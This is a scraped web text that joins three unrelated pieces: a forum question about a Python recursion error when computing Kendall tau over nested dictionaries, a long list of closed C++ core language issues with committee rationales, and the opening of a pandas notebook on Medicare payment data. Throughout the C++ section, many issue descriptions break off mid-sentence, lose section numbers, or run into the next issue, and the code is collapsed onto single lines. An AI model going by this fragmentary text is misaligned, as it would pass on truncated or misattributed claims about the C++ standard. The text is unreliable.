Here's a simple example of my data structure:
import scipy.stats class employee_salaries(object): def __init__(self,management, players, disparity): self.management = management self.players = players self.disparity = disparity # the coach's salary was 12 his 1st year and 11 his 2nd year mgmt1 = [{'Coach':12, 'Owner':15, 'Team Manager': 13}, {'Coach':11, 'Owner':14, 'Team Manager':15}] plyrs1 = [{'Point Guard': 14, 'Power Forward':16,},{'Point Guard':16, 'Power Forward':18}] NBA = {} mgmt2 = [{'Coach':10, 'Owner':12}, {'Coach':13,'Owner':15}] plyrs2 = [{'Point Guard':17, 'Power Forward':14}, {'Point Guard': 22, 'Power Forward':16}] NBA['cavs'] = employee_salaries(mgmt1,plyrs1,0) NBA['celtics'] = employee_salaries(mgmt2,plyrs2,0)
Let's say I wanted to determine the disparity between the Point Guard's salary and the Owner's salary over these two years.
for key, value in NBA.iteritems(): x1=[]; x2=[] num = len(NBA[key].players) for i in range(0,num): x1.append(NBA[key].players[i]['Point Guard']) x2.append(NBA[key].management[i]['Owner']) tau, p_value = scipy.stats.kendalltau(x1, x2) NBA[key].disparity = tau print NBA['cavs'].disparity
Keep in mind this is not my real data. In my actual data structure, there are over 150 keys. And there are more elements in the list of dictionaries. When I run the code above on my real data, I get a runtime error.
RuntimeError: maximum recursion depth exceeded in cmp error.
How can I change the code above so that it doesn't give me a maximum recursion depth error? I want to do this type of comparison and be able to save the value. | http://www.howtobuildsoftware.com/index.php/how-do/bOx/python-list-dictionary-recursion-python-runtimeerror-maximum-recursion-depth-exceeded-in-cmp | CC-MAIN-2018-05 | en | refinedweb |
This document contains the C++ core language issues for which the Committee (J16 + WG21) has decided that no action is required, that is, issues with status "NAD" ("Not A Defect"), "dup" (duplicate), "concepts,"4606..
Bullet 13.3 of _N4567_.
According to 1.10 [intro.multithread] paragraph 24,]
Some programmers find this liberty afforded to implementations to be disadvantageous; see this blog post for a discussion of the subject..
There is a discrepancy between the syntaxes allowed for defining a constructor and a destructor of a class template. For example:
template <class> struct S { S(); ~S (); }; template <class T> S<T>::S<T>() { } // error template <class T> S<T>::~S<T>() { } // okay
The reason for this is that 3.4.3.1 [class.qual] paragraph 2 says that S::S is “considered to name the constructor,” which is not a template and thus cannot accept a template argument list. On the other hand, the second S in S::~S finds the injected-class-name, which “can be used with or without a template-argument-list” (14.6.1 [temp.local] paragraph 1) and thus satisfies the requirement to name the destructor's class (12.4 [class.dtor] paragraph 1).
Would it make sense to allow the template-argument-list in the constructor declaration and thus make the language just a little easier to use?
Rationale (July, 2007):
The CWG noted that the suggested change would be confusing in the case where the class template had both template and non-template constructors.
3.5 [basic.link] paragraph 8 says,
A name with no linkage (notably, the name of a class or enumeration declared in a local scope (3.3.3 [basic.scope.block] )).3 [basic.scope..7.1 [dcl.type.cv] paragraph 4 already forbids modifying a const member of a POD struct. The prohibition need not be repeated in 3.9 [basic.types]..)
Rationale (June, 2008):
A copy constructor takes a reference as its first parameter, thus no user-declared copy constructor can be constexpr. 6 states,
As described below, bool values behave as integral types.
This sentence looks definitely out of order: how can a value behave as a type?
Suggested resolution:
Remove the sentence entirely, as it doesn't supply anything that isn't already stated in the following paragraphs and in the referenced section about integral promotion.
Rationale (July, 2007):
This is, at most, an editorial issue with no substantive impact. The suggestion has been forwarded to the project editor for consideration..
Paragraph 3 of section 4.2.
There is no normative requirement regarding the ability of floating-point values to represent integer values exactly; however, 4..11 .
5.1.5 [expr.prim.lambda] paragraph 2 says,
A closure object behaves as a function object (20.14 [function.objects])...
This linkage to <functional> increases the dependency of the language upon the library and is inconsistent with the definition of “freestanding” in 17.6.1.3 [compliance].
Rationale (July, 2009):
The reference to 20.14 [function.objects] appears in a note, not in normative text, and is intended only to clarify the meaning of the term “function object.” The CWG does not believe that this reference creates any dependency on any library facility..
Rationale (October, 2009):
The consensus of the CWG was that this is not a sufficiently important problem to warrant changing the existing specification.
According to 5.1.5 .5 .5 ...
According to 5.2.1 [expr.sub] paragraph 11,
No entity is captured by an init-capture.
It should be made clearer that a variable, odr-used by an init-capture in a nested lambda, is still captured by the containing lambda as a result of the init-capture.
Rationale (October, 2015):
Subsequent edits have removed the offending phraseXS.
Should the determination of array bounds from an initializer, described in 8.
.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173..
In 5.3.1 [expr.unary.op], part of paragraph 7 describes how to compute the negative of an unsigned quantity:
The negative of an unsigned quantity is computed by subtracting its value from 2n, where n is the number of bits in the promoted operand. The type of the result is the type of the promoted operand.
According to this method, -0U will get the value 2n - 0 = 2n, where n is the number of bits in an unsigned int. However, 2n is obviously out of the range of values representable by an unsigned int and thus not the actual value of -0U. To get the result, a truncating conversion must be applied.
Rationale (April, 2007):
As noted in the issue description, a “truncating conversion” is needed. This conversion is supplied without need of an explicit mention, however, by the nature of unsigned arithmetic given in 3.9.1 [basic.fundamental] paragraph 4:
Unsigned integers, declared unsigned, shall obey the laws of arithmetic modulo 2n where n is the number of bits in the value representation of that particular size of integer.
The standard forbids a lambda from appearing in a sizeof operand:
A lambda-expression shall not appear in an unevaluated operand (Clause 5 [expr]).
(5.1.5 [expr.prim.lambda] paragraph 2). However, there appears to be no prohibition of the equivalent usage when a variable or data member has a closure class as its type:
int main() { int i = 1; int j = 1; auto f = [=]{ return i + j;}; return sizeof(f); }
According to 5.1.5 .
The relational operators have unspecified results when comparing pointers that refer to objects that are not members of the same object or elements of the same array (5.9 [expr.rel] paragraph 2, second bullet). This restriction (which dates from C89) stems from the desire not to penalize implementations on architectures with segmented memory by forcing them essentially to simulate a flat address space for the purpose of these comparisons. If such an implementation requires that objects and arrays to fit within a single segment, this restriction enables pointer comparison to be done simply by comparing the offset portion of the pointers, which could be much faster than comparing the full pointer values.
The problem with this restriction in C++ is that it forces users of the Standard Library containers to use less<T*> instead of the built-in < operator to provide a total ordering on pointers, a usage that is inconvenient and error-prone. Can the existing restriction be relaxed in some way to allow the built-in operator to provide a total ordering? (John Spicer pointed out that the actual comparison for a segmented architecture need only supply a total ordering of pointer values, not necessarily the complete linearization of the address space.)
Rationale (April, 2007):
The current specification is clear and was well-motivated. Analysis of whether this restriction is still needed should be done via a paper and discussed in the Evolution Working Group rather than being handled by CWG as an issue/defect..
Consider:
int* p = false; // Well-formed? int* q = !1; // What about this?>From 3.9.1 [basic.fundamental] paragraph 6: "As described below, bool values behave as integral types."
From 4.11 [conv.ptr] paragraph 1: "A null pointer constant is an integral constant expression rvalue of integer type that evaluates to zero."
From 5 type.]), [intro.defs] in that translation unit.
Rationale (October, 2004):
CWG felt that readers might misunderstand “declaration” as meaning “non-definition declaration.”.
9.
7.1.1 [dcl.stc] paragraph 7 seems out of place in the current organization of the Standard::.....6.4.6 [replacement.functions], 18.6.2.1 [new.delete.single] par 2, and 3.7.4 [basic.stc.dynamic] par 2-3. I don't see anything explicitly saying that the replacement function may not be inline. The closest I can find is 18.6.2.1 ...2.2.1 [class.this] paragraph 1 allows use of this only in the body of a non-static member function, and the return type is not part of the function-body.
Do we want to change the rules to allow these kinds of decltype expressions?
Rationale (February, 2008):
In the other cases where a class type is considered complete within the definition of the class, it is possible to defer handling the construct until the end of the definition. That is not possible for types, as the type may be needed immediately in subsequent declarations.
It was also noted that the primary utility of decltype is in generic contexts; within a single class definition, other mechanisms are possible (e.g., use of a member typedef in both the declaration of the operand of the decltype and to replace the decltype itself).
The first bullet of 7.1.7.2 [dcl.type.simple] paragraph 4 says,
There are two clarifications to this specification that would assist the reader. First, it would be useful to have a note highlighting the point that a parenthesized expression is neither an id-expression nor a member access expression.
Second, the phrase “the type of the entity named by e” is unclear as to whether cv-qualification in the object or pointer expression is or is not part of that type. Rephrasing this to read, “the declared type of the entity,” or adding “(ignoring any cv-qualification in the object expression or pointer expression),” would clarify the intent.
Rationale (February, 2008):
The text is clear enough. In particular, both of these points are illustrated in the last two lines of the example contrasting decltype(a->x) and decltype((a->x)): in the former, the expression has no parentheses, thus satisfying the requirements of the first bullet and yielding the declared type of A::x, while the second has parentheses, falling into the third bullet and picking up the const from the object expression in the member access.
Because type deduction for the auto specifier is described in 7.1.
Rationale (September, 2008):
It is important that the deduction rules be the same in the function and auto cases. The result of this example might be surprising, but maintaining a consistent model for deduction is more important.
An initializer list is treated differently in deducing the type of an auto specifier and in a function call. In 7.1.7.4 [dcl.spec.auto] paragraph 6, an initializer list is given special treatment so that auto is deduced as a specialization of std::initializer_list:
Once the type of a declarator-id has been determined according to 8.3 [dcl.meaning], either a new invented type template parameter U or, if the initializer is a braced-init-list (8++..4.1 [basic.stc.dynamic.allocation] paragraph 1, 3.7.
Rationale (July, 2009):
The current specification does not restrict injection of names in elaborated-type-specifiers, and the consensus of the CWG was that no change is needed on this point...
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.
.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.)..
The [[noreturn]] attribute, as specified in 7.6.8 ..
According to 8.3.4 [dcl.array] paragraph 1,
In a declaration T D where D has the form
D1 [ constant-expressionopt ] attribute-specifieropt
and the type of the identifier in the declaration T D1 is “derived-declarator-type-list T”, then the type of the identifier of D is an array type; if the type of the identifier of D contains the auto type-specifier, the program is ill-formed.
This.6.3 [dcl.init.ref] paragraph 3 for function types. _N4567_.
In section 8.
According to the logic in 8.6.3 [dcl.init.ref] paragraph 5 as follows:
...
If the initializer expression is a string literal (2.6 [dcl.init] and follow the logic ladder there with the element,” the logical result is that an initializer for a scalar could be arbitrarily deeply nested in braces, with each trip through the 8.6 [dcl.init] / 8.6.4 [dcl.init.list] recursion peeling off one layer. Presumably that is not intended.
Rationale (October, 2012):
The wording “a single element of type E” excludes the case of a nested braced initializer, because such an element has no type.
If an initializer_list object is copied and the copy is elided, is the lifetime of the underlying array object extended? E.g.,
void f() { std::initializer_list<int> L = std::initializer_list<int>{1, 2, 3}; // Lifetime of array extended? }
The current wording is not clear.
(See also issue 1299.)
Notes from the October, 2012 meeting:
The consensus of CWG was that the behavior should be the same, regardless of whether the copy is elided or not.
Rationale (November, 2016):
With the adoption of paper P0135R1, there is no longer any copy in this example to be elided.
According to 8.
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant to the current working paper..2.
Another instance to consider is that of invoking a member function from a null pointer:
struct A { void f () { } }; int main () { A* ap = 0; ap->f (); }
Which is explicitly noted as undefined in 9.2.2 [class.mfct.non-static],.
The current wording of 9.2 incorrect.
9.2.1 [class.mfct] paragraph 5 says this about member functions defined lexically outside the class:
the member function name shall be qualified by its class name using the :: operator
9.2.3.2 [class.static.data] paragraph 2 says this about static data members:
In the definition at namespace scope, the name of the static data member shall be qualified by its class name using the :: operator
I would have expected similar wording in 9.2.5 [class.nest] paragraph 3 for nested classes. Without such wording, the following seems to be legal (and is allowed by all the compilers I have):
struct base { struct nested; }; struct derived : base {}; struct derived::nested {};
Is this just an oversight, or is there some rationale for this behavior?
Rationale (July, 2008):
The wording in 9 [class] paragraph 10 (added by the resolution of issue 284, which was approved after this issue was raised).
Is this legal? Should it be?
struct E { union { struct { int x; } s; } v; };
One compiler faults a type definition (i.e. of the anonymous struct) since it is in an anonymous union [9.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.
Can a member of a union be of a class that has a user-declared non-default constructor? The restrictions on union membership in 9.
Rationale (August, 2011):
As given in the preceding note.
According to 9.4 _N4567_.
After the adoption of the wording for extended friend declarations, we now have this new paragraph in 11 a friend declaration designates a (possibly cv-qualified) class type or a class template, that class or template is declared as a friend; otherwise, the friend declaration is ignored. [Example:...
Rationale (September, 2008):
The proposed extension is not needed. The template case can be handled simply by providing a template header:
template <typename T> friendE..
The current wording of the Standard does not make clear whether a special member function that is defaulted and implicitly deleted is trivial. Triviality is visible in various ways that don't involve invoking the function, such as determining whether a type is trivially copyable and determining the result of various type traits. It also factors into some ABI specifications.
(See also issue 1734.)
Notes from the June, 2014 meeting:
CWG felt that deleted functions should be trivial. See also issue 1590.
Additional note, November, 2014:
See paper N4148..
Consider the following example:
template<typename T, T V, int n = sizeof(V)> using X = int[n]; template<typename T> void f(X<T, 0>*) {} void g() { f<char>(0); }
Current implementations get confused here because they substitute V=0 into the default argument of X before knowing the type T and end up with f having type void (int (*)[sizeof(0)]), that is, the array bound does not depend on T. It's not clear what should happen here.
Rationale (March, 2016):
There is no problem with the specification, only with the implementations; the default argument for n is dependent because V has a dependent type....
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.. [intro.defs] “undefined behavior.”.7.4 .2.,
template<class T> struct A { enum E : T; enum class S : T; }; template<> enum A<int>::E : int { eint }; // OK template<> enum class A<int>::S : int { sint }; // OK template<class T> enum A<T>::E : T { eT }; template<class T> enum class A<T>::S : T { sT }; template<> enum A<char>::E : int { echar }; // ill-formed, A<char>::E was instantiated // when A<char> was instantiated template<> enum class A<char>::S : int { schar }; // OK.
It is not clear whether the following common practice is valid by the current rules:
// foo.h template<typename T> struct X { int f(); // never defined }; // foo.cc #include "foo.h" template<> int X<int>::f() { return 123; } // main.cc #include "foo.h" int main() { return X<int>().f(); }
Relevant rules include 14 [temp] paragraph 6,
A function template, member function of a class template, variable template, or static data member of a class template shall be defined in every translation unit in which it is implicitly instantiated (14.7.1 [temp.inst]) unless the corresponding specialization is explicitly instantiated (14.7.2 [temp.explicit]) in some translation unit; no diagnostic is required.
14.7.1 [temp.inst] paragraph 2,
Unless a member of a class template or a member template has been explicitly instantiated or explicitly specialized, the specialization of the member is implicitly instantiated when the specialization is referenced in a context that requires the member definition to exist...
and 14.7.3 [temp.expl.spec] paragraph 6:
If a template, a member template or a member of a class template is explicitly specialized then that specialization shall be declared before the first use of that specialization that would cause an implicit instantiation to take place, in every translation unit in which such a use occurs; no diagnostic is required. If the program does not provide a definition for an explicit specialization and either the specialization is used in a way that would cause an implicit instantiation to take place or the member is a virtual member function, the program is ill-formed, no diagnostic required. An implicit instantiation is never generated for an explicit specialization that is declared but not defined.
The intent appears to be that the reference in main.cc violates two rules: it implicitly instantiates something for which no definition is provided and that is not explicitly instantiated elsewhere, and it also causes an implicit instantiation of something explicitly specialized in another translation unit without a declaration of the explicit specialization.
Rationale (March, 2016):
As stated in the analysis, the intent is for the example to be ill-formed, no diagnostic required...
Rationale (February, 2008):
In the absence of a compelling need, the CWG felt that it was better not to change the existing rules. Allowing this case could cause a quiet change to the meaning of a program, because attempting to create a pointer to a reference type is currently a deduction failure...8.2.4 [temp.deduct.partial] paragraph 5). This means that neither parameter type is at least as specialized as the other (paragraph 8).
According to 14.).
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant after the adoption of paper P0490R0 at the November, 2016 meeting.
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant after the adoption of paper P0490R0 at the November, 2016 meeting..11 . 133...7 [depr.uncaught]..
Rationale (September, 2008):
It is unclear what effect the provision of “unique mappings” has or if a conforming program could detect the failure of an implementation to do so. There has been a significant effort to synchronize this clause with the corresponding section of the C99 Standard, and given the lack of perceptible impact of the proposed change, there is insufficient motivation to introduce a new divergence in the wording.
According to 16.2 [cpp.include] paragraph 4,
A preprocessing directive of the form
# include pp-tokens new-line
..
Rationale (October, 2008):
It was noticed that issue 353, an exact duplicate of this one, was independently opened and resolved.
According to..2.1 [class.mfct]) or static data member (9.2::*)[]);.
It is not clear whether the following declaration is well-formed:
struct S { int i; } s = { { 1 } };According to 8.6.1 [dcl.init.aggr] paragraph 2, a brace-enclosed initializer is permitted for a subaggregate of an aggregate; however, i is a scalar, not an aggregate. 8.6 [dcl.init] paragraph 13 says that a standalone declaration like
int i = { 1 };is permitted, but it is not clear whether this says anything about the form of initializers for scalar members of aggregates.
This is (more) clearly permitted by the C89 Standard.
Rationale (May, 2008):
Issue 632 refers to exactly the same question and has a more detailed discussion of the considerations involved.
In an example like
const int&r {1};
the expectation is that this creates a temporary of type const int containing the value 1 and binds the reference to it. And it does, but along the way it creates two temporaries. The wording in 8.2.3.2 [class.static.data] paragraph 3 says,
If a static data member is of const literal type, its declaration in the class definition can specify a brace-or-equal-initializer in which every initializer-clause that is an assignment-expression is a constant expression..6.3 [dcl.init.ref] did have distinct bullets for converting to an “lvalue” and to an “rvalue;” we now have a bullet which is not exclusively one or the other.
Possible fix
Add reference to [13.3.1.6 [over.match.ref]] in 8.6.3 [dcl.init.ref] for direct binding to rvalue reference/const non-volatile via UDC.
Remove redundent sentence referring to second SCS.
Modify example to indicate operator int&() is not a candidate function.
Clarify that the point from 8.
Consider the following example:
template<typename ...T> struct X { void f(); static int n; }; template<typename T, typename U> using A = T; template<typename ...T> void X<A<T, decltype(sizeof(T))>...>::f() {} template<typename ...T> void X<A<T, decltype(sizeof(T))>...>::n = 0; void g() { X<void>().f(); X<void>::n = 1; }
Should this be valid? The best answer would seem to be to produce an error during instantiation, and that appears to be consistent with the current Standard wording, but there is implementation divergence.
See also issue 2021.
Rationale (May, 2015):
This issue is a duplicate os issue 1979.
The description of how the partial ordering of template functions is determined in 14.5..
The example in 18.6.2.3 ..11 object type or a function type, and CV1 and CV2 are cv-qualifier-seqs, there exist candidate operator functions of the form
CV12 T& operator->*(CV1 C1*, CV2 T C2::*);
where CV12 is the union of CV1 and CV2.
C1 and C2 should be effective class types (cf 5.5 [expr.mptr.oper] paragraph 3.
Also, should the relationship between those two classes be expressed as std::SameType or std::DerivedFrom requirements?..).
Rationale (July, 2009):
This suggestion would need a full proposal and discussion by the EWG before the CWG could consider it..12 .5 by EWG. current wording of the Standard appears to permit code like
void f(const char (&)[10]); void g() { f("123"); f({'a','b','c','\0'}); }
creating a temporary array of ten elements and binding the parameter reference to it. This is controversial and should be reconsidered. (See issues 1058 and 1232.)
Rationale (March, 2016):
Whether to support creating a temporary array in such cases is a question of language design and thus should be?
Current implementations ignore narrowing conversions during overload resolution, emitting a diagnostic if calling the selected function would involve narrowing. For example:
struct s { long m }; struct ss { short m; }; void f( ss ); void f( s ); void g() { f({ 1000000 }); // Ambiguous in spite of narrowing for f(ss) }
However, the current wording of 13.3.3.1.5 [over.ics.list] paragraph 7 says,
Otherwise, if the parameter has an aggregate type which can be initialized from the initializer list according to the rules for aggregate initialization (8.6.1 [dcl.init.aggr]), the implicit conversion sequence is a user-defined conversion sequence with the second standard conversion sequence an identity conversion.
In the example above, ss cannot be initialized from { 1000000 } because of the narrowing conversion, so presumably f(ss) should not be considered. If this is not the intended outcome, paragraph 7 should be restated in terms of having an implicit conversion sequence, as in, e.g., bullet 9.1, instead of a valid initialization.
Rationale (March, 2016):
This is a question of language design and thus more suited to consideration by EWG.. | http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_closed.html | CC-MAIN-2018-05 | en | refinedweb |
std::reverse not supported?
Hi all,
I'm new to c++ and Qt. I am, and have been a C# VS dev since, well, before it was released and was a Java guy before that. Now that you know who I am, here's my issue I'm having:
I have a solution that was developed in VS. Within that solution is a vectorUtil.h file. In that file is a method called Reverse which uses void std::reverse( BidirIt first, BidirIt last ). I know that it may be frowned upon to have implementation in a .h file but I didn't write it.
However, when I integrated the code into a Qt project (Qt Creator 4.3.1 Community), it issues a compile-time error that states, 'reverse' was not declared in this scope. It doesn't appear in intellisense (or whatever it's called in Qt). It's almost as if it's not in the std library. Anybody have any insight?
I've bold'd the line that the compiler is puking on. Here is the relevant code and includes:
#pragma once #ifdef DLL_EXPORT_WIN32 #ifdef UTILITIES_EXPORTS #define UTILITIES_API __declspec(dllexport) #else #define UTILITIES_API __declspec(dllimport) #endif #else #define UTILITIES_API #endif #include <vector> #include <string> using namespace std; namespace Utilities { /// <summary> /// Class Property. /// Helps with creating abstractions /// </summary> class UTILITIES_API VectorUtil { public: /// <summary> /// Reverses the specified data. /// </summary> /// <param name="data" type="vector<BYTE>&">The data.</param> /// <returns>std.vector<_Ty, _Alloc>.</returns> template<class Type> static vector<Type> Reverse(vector<Type>& data) { vector<Type> reverseData(data.size()); Copy(data, 0, reverseData, 0, reverseData.size()); **reverse(begin(reverseData), end(reverseData));** return reverseData; } }; }
You're missing the
#include <algorithm>, see for instance cplusplus.com.
Thank you for your response Johan. I had thought that too. I added the #include <algorithm> and then, upon compiling, got the following error:
[copydata] Error 4
It's really descriptive and lets me know exactly what is wrong. In searching for it online, I found troves of information on the error... ok, not really. It's not descriptive and there is nothing online about that error that I can find :) However I did notice that I'm on 5.8 and need to be on 5.9.1. I'll update and report back.
We can put this one to rest. I upgraded to 5.9.1 and that did the trick. Thanks! | https://forum.qt.io/topic/82801/std-reverse-not-supported | CC-MAIN-2018-05 | en | refinedweb |
Hi Benji > Betreff: Re: AW: [Zope3-dev] Why do we restrict our egg testing?
Advertising
[...] > Second, why would you include all of the zope.* eggs if that > particular package doesn't depend on them? That's the point which I don't understand that nobody is seeing: Not my egg depends on other packages. Other package depend on the egg I develop. And tests are there for ensure that other eggs will work with my work on a specific egg. Tests are a setup of tools which can ensure that my changes are compatible with existing things. > > Is there a benefit to not depend on all zope.* packages in each egg > > test setup if we do a transition to indvidual packages? > > > > I understand the benefit to have smaller dependencies in > eggs, but I > > still think a egg should run all tests we have in the zope > namespace. > > Like we did in our old trunk setup. > > > This whould allow us to run all zope.* tests during egg development. > > It sounds like it would build the equivalent of the old-style > Zope 3 trunk for each and every zope.* buildout. That sounds > awful. Perhaps I'm misunderstanding your proposal. All zope.* tests together are a way to ensure compatibility. I doesn't make sense to me not participate with all tests before a single egg get deployed. Not running all test in a namespace like we have with the zope package namspace, sounds to me that a package which doesn't like to agree on all tests should get move to another namesapce. Regards Roger Ineichen > -- > Benji York > Senior Software Engineer > Zope Corporation > _______________________________________________ Zope3-dev mailing list Zope3-dev@zope.org Unsub: | https://www.mail-archive.com/zope3-dev@zope.org/msg09679.html | CC-MAIN-2018-05 | en | refinedweb |
Now, let's say you have to do some analysis on layers inside the group layers, you can loop the layers as follows:
import arcpy
mxdPath = r"c:\temp\mapDoc.mxd"
mxd = arcpy.mapping.MapDocument(mxdPath)
layers = arcpy.mapping.ListLayers()
for layer in layers:
if layer.isGroupLayer:
for subLayer in layer:
print "This layer is in a group layer: " + str(subLayer.name)
This will print a list of layer contained in a groupLayer. | https://anothergisblog.blogspot.com/2011/07/arcpy-looking-inside-group-layers.html | CC-MAIN-2018-05 | en | refinedweb |
Problem
I want to implement an algorithm from an unpublished paper by my supervisor and as part of that, I need to construct a covariance matrix C using some rules given in the paper. I'm coming from Matlab and wanted to take this opportunity to finally learn Python, hence my question: How do I do this in the most efficient (fast) way in Python (including numpy,scipy)?
Subproblem 1:
cov(Xs, Xt) = min{s,t} − st
First off, for others who may come across this question in the future: If you did have data and were wanting to estimate a covariance matrix, as several people have noted, use
np.cov or something similar.
However, your question is about how to build a large matrix given some pre-defined rules. To clear up some confusion in the comments: Your question doesn't seem to be about estimating a covariance matrix, it's about specifying one. In other words, you're asking how to build up a large array given some pre-defined rules.
Which way is most efficient is going to depend on what you're doing in detail. Most performance tricks in this case will involve exploiting symmetry in the calculation you're preforming. (For example, is one row going to be identical?)
It's hard to say anything specific without knowing exactly what you're doing. Therefore, I'll focus on how to do this type of thing in general. (Note: I just noticed your edit. I'll include an example for a Brownian Bridge in just a bit...)
The most basic case is a constant row or column in the output array. It's easy to create the array and assign values to a column or row using slicing syntax:
import numpy as np num_vars = 10**4 cov = np.zeros((num_vars, num_vars), dtype=float)
To set an entire column/row:
# Third column will be all 9's cov[:,2] = 9 # Second row will be all 1's (will overwrite the 9 in col3) cov[1,:] = 1
You can also assign arrays to columns/rows:
# 5th row will have random values cov[4,:] = np.random.random(num_vars) # 6th row will have a simple geometric sequence cov[5,:] = np.arange(num_vars)**2
In many cases, (but probably not this exact case) you'll want to build up your output from existing arrays. You can use
vstack/
hstack/
column_stack/
tile and many other similar functions for this.
A good example is if we're setting up a matrix for a linear inversion of a polynomial:
import numpy as np num = 10 x = np.random.random(num) # Observation locations # "Green's functions" for a second-order polynomial # at our observed locations A = np.column_stack([x**i for i in range(3)])
However, this will build up several temporary arrays (three, in this case). If we were working with at 10000-dimensional polynomial with 10^6 observations, the approach above would use too much RAM. Therefore, you might iterate over columns instead:
ndim = 2 A = np.zeros((x.size, ndim + 1), dtype=float) for j in range(ndim + 1): A[:,j] = x**j
In most cases, don't worry about the temporary arrays. The
colum_stack-based example is the right way to go unless you're working with relatively large arrays.
Without any more information, we can't exploit any sort of symmetry. The most general way is to just iterate through. Typically you'll want to avoid this approach, but sometimes it's unavoidable (especially if the calculation depends on a previous value).
Speed-wise this is identical to nested for loops, but it's easier (especially for >2D arrays) to use
np.ndindex instead of multiple for loops:
import numpy as np num_vars = 10**4 cov = np.zeros((num_vars, num_vars), dtype=float) for i, j in np.ndindex(cov.shape): # Logic presumably in some function... cov[i, j] = calculate_value(i, j)
If many cases, you can vectorize index-based calculations. In other words, operate directly on arrays of the indices of your output.
Let's say we had code that looked like:
import numpy as np cov = np.zeros((10, 10)), dtype=float) for i, j in np.ndindex(cov.shape): cov[i,j] = i*j - i
We could replace that with:
i, j = np.mgrid[:10, :10] cov = i*j - i
As another example, let's build up a 100 x 100 "inverted cone" of values:
# The complex numbers in "mgrid" give the number of increments # mgrid[min:max:num*1j, min:max:num*1j] is similar to # meshgrid(linspace(min, max, num), linspace(min, max, num)) y, x = np.mgrid[-5:5:100j, -5:5:100j] # Our "inverted cone" is just the distance from 0 r = np.hypot(x, y)
This is a good example of something that can be easily vectorized. If I'm reading your example correctly, you'd want something similar to:
import numpy as np st = np.mgrid[1:101, 1:101] s, t = st cov = st.min(axis=0) - s * t
Overall, I've only touched on a few general patterns. However, hopefully this gets you pointed in the right direction. | https://codedump.io/share/H7DVoTauFMDb/1/building-a-covariance-matrix-in-python | CC-MAIN-2018-05 | en | refinedweb |
General
Transform
General Transform
General Transform
Class
Definition
Provides generalized transformation support for objects. GeneralTransform is a base class that's in the hierarchy of practical transform classes such as TranslateTransform.
public : class GeneralTransform : DependencyObject, IGeneralTransform, IGeneralTransformOverrides
public class GeneralTransform : DependencyObject, IGeneralTransform, IGeneralTransformOverrides
Public Class GeneralTransform Inherits DependencyObject Implements IGeneralTransform, IGeneralTransformOverrides
- Inheritance
- GeneralTransformGeneralTransformGeneralTransform
- Attributes
-.
Constructors
Provides base class initialization behavior for GeneralTransform -derived classes.
protected : GeneralTransform()
protected GeneralTransform()
Protected Sub New()
Properties)
Gets the inverse transformation of this GeneralTransform, if possible.
public : GeneralTransform Inverse { get; }
public GeneralTransform Inverse { get; }
Public ReadOnly Property Inverse As GeneralTransform
An inverse of this instance, if possible; otherwise null.
Implements the behavior for return value of Inverse in a derived or custom GeneralTransform.
protected : virtual GeneralTransform InverseCore { get; }
protected virtual GeneralTransform InverseCore { get; }
Protected Overridable ReadOnly Property InverseCore As GeneralTransform
The value that should be returned as Inverse by the GeneralTransform.
Methods
ClearValue(DependencyProperty) ClearValue(DependencyProperty) ClearValue(DependencyProperty)
Clears the local value of a dependency property.(Inherited from DependencyObject)
GetAnimationBaseValue(DependencyProperty) GetAnimationBaseValue(DependencyProperty) GetAnimationBaseValue(DependencyProperty)
Returns any base value established for a dependency property, which would apply in cases where an animation is not active.(Inherited from DependencyObject)
GetValue(DependencyProperty) GetValue(DependencyProperty) GetValue(DependencyProperty)
Returns the current effective value of a dependency property from a DependencyObject.(Inherited from DependencyObject)
ReadLocalValue(DependencyProperty) ReadLocalValue(DependencyProperty) ReadLocalValue(DependencyProperty)
Returns the local value of a dependency property, if a local value is set.(Inherited from DependencyObject))
SetValue(DependencyProperty,Object) SetValue(DependencyProperty,Object) SetValue(DependencyProperty,Object)
Sets the local value of a dependency property on a DependencyObject.(Inherited from DependencyObject)
Transforms the specified bounding box and returns an axis-aligned bounding box that is exactly large enough to contain it.
public : Rect TransformBounds(Rect rect)
public Rect TransformBounds(Rect rect)
Public Function TransformBounds(rect As Rect) As Rect
Provides the means to override the TransformBounds behavior in a derived transform class.
protected : virtual Rect TransformBoundsCore(Rect rect)
protected virtual Rect TransformBoundsCore(Rect rect)
Protected Overridable Function TransformBoundsCore(rect As Rect) As Rect
Uses this transformation object's logic to transform the specified point, and returns the result.
public : Point TransformPoint(Point point)
public Point TransformPoint(Point point)
Public Function TransformPoint(point As Point) As.
- See Also
-
Attempts to transform the specified point and returns a value that indicates whether the transformation was successful.
public : Platform::Boolean TryTransform(Point inPoint, Point outPoint)
public bool TryTransform(Point inPoint, Point outPoint)
Public Function TryTransform(inPoint As Point, outPoint As Point) As bool
true if inPoint was transformed; otherwise, false.
Provides the means to override the TryTransform behavior in a derived transform class.
protected : virtual Platform::Boolean TryTransformCore(Point inPoint, Point outPoint)
protected virtual bool TryTransformCore(Point inPoint, Point outPoint)
Protected Overridable Function TryTransformCore(inPoint As Point, outPoint As Point) As bool
true if inPoint was transformed; otherwise, false.
UnregisterPropertyChangedCallback(DependencyProperty,Int64) UnregisterPropertyChangedCallback(DependencyProperty,Int64) UnregisterPropertyChangedCallback(DependencyProperty,Int64)
Cancels a change notification that was previously registered by calling RegisterPropertyChangedCallback.(Inherited from DependencyObject) | https://docs.microsoft.com/en-us/uwp/api/Windows.UI.Xaml.Media.GeneralTransform | CC-MAIN-2018-05 | en | refinedweb |
Each record in the Medicare payment database summarizes a single type of service provided by a single provider. Each provider belongs to a "provider type" category. There are around 2700 different service types and around 80 different provider types.
A provider of a given type can engage in various services. In this notebook, we explore the relationships between provider types and service types.
Since the provider type and service type are nominal variables, the main focus here will be on the large contingency table that can be formed by counting the number of services of a given type that are provided by all providers of a given type.
We will use these libraries:
import pandas as pd import numpy as np
Next we read in the data file. This is the payment data for one state. We can check the size of the data set and the variable names (
columns) to get a sense for what we have.
